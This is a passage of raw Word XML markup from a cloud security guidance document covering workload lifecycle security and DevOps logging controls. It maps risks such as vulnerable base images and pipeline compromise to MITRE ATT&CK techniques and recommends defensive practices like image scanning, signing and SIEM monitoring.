        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Focus specialized DAST efforts on high-risk attack surfaces: REST and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>GraphQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> APIs (test authentication bypasses, authorization failures, injection vulnerabilities, excessive data exposure, insecure direct object references), authentication and session management (validate token security, timeout enforcement, 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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>Leverage integrated platforms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333437C4" w14:textId="2A5BAE12" w:rsidR="000E5A9F" w:rsidRPr="00E53977" w:rsidRDefault="000E5A9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">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106" w:name="_Toc242449569"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>DS-6: Secure the workload lifecycle</w:t>
      </w:r>
      <w:bookmarkEnd w:id="106"/>
    </w:p>
    <w:p w14:paraId="1F6E9E6C" w14:textId="55B991DA" w:rsidR="000E5A9F" w:rsidRPr="00E53977" w:rsidRDefault="000E5A9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6B9110" w14:textId="32E77598" w:rsidR="000E5A9F" w:rsidRPr="00E53977" w:rsidRDefault="000E5A9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>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cryptographic signatures, maintain minimal base images, and enforce security baselines throughout the workload lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEB01C6" w14:textId="0E5B01EB" w:rsidR="000E5A9F" w:rsidRPr="00E53977" w:rsidRDefault="000E5A9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4EF4C54F" w14:textId="586B910B" w:rsidR="000E5A9F" w:rsidRPr="00E53977" w:rsidRDefault="000E5A9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Vulnerable production VM images</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F75C28" w14:textId="3A6F0D2B" w:rsidR="000E5A9F" w:rsidRPr="00E53977" w:rsidRDefault="000E5A9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Unpatched OS baselines or misconfigured golden images propagate weaknesses across all deployed VMs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B59DF3D" w14:textId="7FC621C2" w:rsidR="000E5A9F" w:rsidRPr="00E53977" w:rsidRDefault="000E5A9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Unpatched vulnerable base images</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE2FAE3" w14:textId="18DF59A8" w:rsidR="000E5A9F" w:rsidRPr="00E53977" w:rsidRDefault="000E5A9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Containers built on CVE-affected bases (Log4Shell, Heartbleed, OpenSSL) expose workloads to exploitation and escape.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E21C4F" w14:textId="24593BB2" w:rsidR="000E5A9F" w:rsidRPr="00E53977" w:rsidRDefault="000E5A9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Stale vulnerable artifacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BF010A" w14:textId="2508140A" w:rsidR="000E5A9F" w:rsidRPr="00E53977" w:rsidRDefault="000E5A9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Images and packages left unscanned accumulate CVEs, expanding attack surface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04511788" w14:textId="2EBE2F18" w:rsidR="000E5A9F" w:rsidRPr="00E53977" w:rsidRDefault="000E5A9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Insufficient image verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545D34E9" w14:textId="61339808" w:rsidR="000E5A9F" w:rsidRPr="00E53977" w:rsidRDefault="000E5A9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="288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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Bloated attack surface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBD5AAA" w14:textId="4C19ED2A" w:rsidR="000E5A9F" w:rsidRPr="00E53977" w:rsidRDefault="000E5A9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Missing security baselines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D500AE9" w14:textId="2CDE6C16" w:rsidR="000E5A9F" w:rsidRPr="00E53977" w:rsidRDefault="000E5A9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>VM and container images deployed without CIS benchmark compliance, security hardening, or minimal privilege configuration create exploitable gaps in defense-in-depth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A7BCE5" w14:textId="56B40C1D" w:rsidR="000E5A9F" w:rsidRPr="00E53977" w:rsidRDefault="000E5A9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75558422" w14:textId="60A30E57" w:rsidR="000E5A9F" w:rsidRDefault="000E5A9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656E469A" w14:textId="4B115239" w:rsidR="00EA6627" w:rsidRPr="00E53977" w:rsidRDefault="00EA6627">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="444"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA6627">
        <w:t>exploit public-facing application (T1190) leveraging unpatched vulnerabilities in application containers or web services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FE8200" w14:textId="18D9F1DB" w:rsidR="00844C45" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Execution (TA0002)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF78F54" w14:textId="04005127" w:rsidR="00EA6627" w:rsidRPr="00E53977" w:rsidRDefault="00EA6627">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="444"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EA6627">
        <w:t>deploy</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EA6627">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EA6627">
        <w:t>container</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EA6627">
        <w:t xml:space="preserve"> (T1610) deploying malicious containers that appear legitimate due to insufficient image verification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55189EE0" w14:textId="4F180029" w:rsidR="00844C45" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Privilege Escalation (TA0004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46604464" w14:textId="3986E161" w:rsidR="00EA6627" w:rsidRPr="00E53977" w:rsidRDefault="00EA6627">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="444"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA6627">
        <w:t>escape to host (T1611) exploiting container vulnerabilities to break out of container isolation and compromise the host system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C9D2B6" w14:textId="5673E16D" w:rsidR="00844C45" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Lateral Movement (TA0008)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185E83F8" w14:textId="7E5984DD" w:rsidR="00EA6627" w:rsidRPr="00E53977" w:rsidRDefault="00EA6627">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="444"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA6627">
        <w:t>exploitation of remote services (T1210) pivoting across vulnerable VMs or containers deployed from compromised images.</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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Secure workload artifacts through these practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F60A822" w14:textId="0EC1C3B9" w:rsidR="00844C45" w:rsidRPr="00E53977" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Establish immutable infrastructure principles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF9BF97" w14:textId="56372FDA" w:rsidR="00844C45" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>Treat</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> container images and VM images as critical artifacts requiring the same security rigor as source code-vulnerable base images propagate weaknesses to every deployed instance. Establish immutable infrastructure principles where workload artifacts are built once, scanned comprehensively, cryptographically signed, and deployed without modification to ensure consistency and traceability throughout the lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE2FA55" w14:textId="77777777" w:rsidR="00B3588D" w:rsidRDefault="00B3588D" w:rsidP="00B3588D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2520"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02FB9B73" w14:textId="77777777" w:rsidR="00B3588D" w:rsidRPr="00E53977" w:rsidRDefault="00B3588D" w:rsidP="00B3588D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2520"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="632C9B4F" w14:textId="1FA4DE17" w:rsidR="00650181" w:rsidRPr="00E53977" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Use minimal base images with multi-stage builds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097E696E" w14:textId="581A7BE3" w:rsidR="00844C45" w:rsidRPr="00E53977" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">For container workloads, implement layered image security starting with minimal base images that contain only essential runtime components, dramatically reducing attack surface compared to full operating system images. Use multi-stage builds </w:t>
      </w:r>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>to separate build-time dependencies from runtime images-compile and build in feature-rich images, then copy only the final artifacts to minimal runtime images, eliminating development tools, package managers, and build dependencies that increase vulnerability exposure and provide attackers with exploitation tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEB28C0" w14:textId="076EE8B3" w:rsidR="00844C45" w:rsidRPr="00E53977" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Integrate automated scanning with quarantine policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2853FEAA" w14:textId="22759948" w:rsidR="00844C45" w:rsidRPr="00E53977" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Integrate automated vulnerability scanning into the image build pipeline that scans every image before registry storage, checking against comprehensive CVE databases and continuously rescanning stored images as new vulnerabilities are disclosed. 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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Enforce cryptographic signing and verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EC5CB8" w14:textId="60328115" w:rsidR="00844C45" w:rsidRPr="00E53977" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Enforce image integrity through cryptographic signing and verification at every stage-sign </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>images</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> at build time, verify signatures before deployment, and reject unsigned or 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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Maintain hardened golden images for VMs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60349ABB" w14:textId="076B5AED" w:rsidR="00844C45" w:rsidRPr="00E53977" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>For VM workloads, maintain centralized golden image repositories with CIS benchmark-compliant, hardened base images that undergo regular security patching and compliance validation. Implement automated image building pipelines that incorporate security updates, remove unnecessary services, enforce least-privilege configurations, and generate fresh images on defined schedules rather than patching running systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FA34D7" w14:textId="3C6BA7F8" w:rsidR="00844C45" w:rsidRPr="00E53977" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Leverage integrated security platforms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5472E0" w14:textId="7A77C64C" w:rsidR="00844C45" w:rsidRPr="00E53977" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>Solutions like Azure Container Registry with Microsoft Defender for Containers integration provide automated scanning, quarantine workflows, content trust, and multi-region replication with consistent security policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B20650" w14:textId="3C34AF6C" w:rsidR="00844C45" w:rsidRPr="00E53977" w:rsidRDefault="00844C45" w:rsidP="00844C45">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="_Toc242449570"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Monitor and audit DevOps activities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="107"/>
    </w:p>
    <w:p w14:paraId="7D910CF2" w14:textId="28578F13" w:rsidR="00844C45" w:rsidRPr="00E53977" w:rsidRDefault="00844C45" w:rsidP="00844C45">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="108" w:name="_Toc242449571"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>DS-7: Implement DevOps logging and monitoring</w:t>
      </w:r>
      <w:bookmarkEnd w:id="108"/>
    </w:p>
    <w:p w14:paraId="43624C50" w14:textId="6A551AA0" w:rsidR="00844C45" w:rsidRPr="00E53977" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A43343A" w14:textId="4295DC2A" w:rsidR="00844C45" w:rsidRPr="00E53977" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Implement comprehensive DevOps activity logging through audit streaming with integration to centralized Security Information and Event Management (SIEM) platforms for security analysis, real-time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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="140BE7A8" w14:textId="78A49AC6" w:rsidR="00844C45" w:rsidRPr="00E53977" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Undetected pipeline compromises</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A2508E" w14:textId="382724FB" w:rsidR="00844C45" w:rsidRPr="00E53977" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Attackers modify CI/CD pipelines to inject malicious code, exfiltrate secrets, or establish backdoors without triggering alerts due to absent or insufficient audit logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50009202" w14:textId="540BDFA9" w:rsidR="00844C45" w:rsidRPr="00E53977" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Insider threats modifying code or infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736B4547" w14:textId="713B0CA8" w:rsidR="00844C45" w:rsidRPr="00E53977" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="252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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Lack of comprehensive audit </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>trails</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="113EFD9A" w14:textId="7DE62B20" w:rsidR="00844C45" w:rsidRPr="00E53977" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="252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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Delayed incident response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD7840F" w14:textId="1FD5593B" w:rsidR="00844C45" w:rsidRPr="00E53977" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Mean Time to Detect (MTTD) extends from hours to weeks when security teams lack real-time alerting, anomaly detection, and automated correlation of DevOps security events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8B75C0" w14:textId="1C46D45C" w:rsidR="00844C45" w:rsidRPr="00E53977" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Compliance audit failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DC5C23" w14:textId="660F108E" w:rsidR="00844C45" w:rsidRPr="00E53977" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Regulatory requirements (SOX, PCI-DSS, HIPAA, ISO 27001) mandating comprehensive audit trails, change tracking, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>access logging cannot be satisfied without centralized DevOps monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD568B0" w14:textId="27CB887E" w:rsidR="00844C45" w:rsidRPr="00E53977" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Privilege escalation blindness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3810F55F" w14:textId="02717D0A" w:rsidR="00844C45" w:rsidRPr="00E53977" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
